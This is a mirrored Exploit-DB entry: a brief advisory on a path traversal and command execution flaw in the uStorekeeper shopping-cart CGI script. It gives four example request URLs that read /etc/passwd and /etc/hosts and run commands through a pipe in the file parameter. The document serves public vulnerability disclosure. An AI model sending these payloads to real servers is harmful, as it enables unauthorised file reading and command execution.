bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/cgi/remote/20725.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

16 lines
No EOL
1,004 B
Text
Raw Permalink Blame History

source: https://www.securityfocus.com/bid/2536/info
A vulnerability exists in versions of uStorekeeper Online Shopping System from Microburst Technologies.
The script fails to properly validate user-supplied input, allowing remote users to submit URLs containing '/../' sequences and arbitrary filenames or commands, which will be executed or displayed with the privilege level of the webserver user.
This permits the remote user to request files and execute commands from arbitrary locations on the host filesystem, outside the script's normal directory scope.
http://www.example.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../etc/hosts
http://www.example.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../bin/ls |
http://www.example.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
http://www.example .com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../.
./../../../../bin/cat%20ustorekeeper.pl|
Reference in a new issue View git blame Copy permalink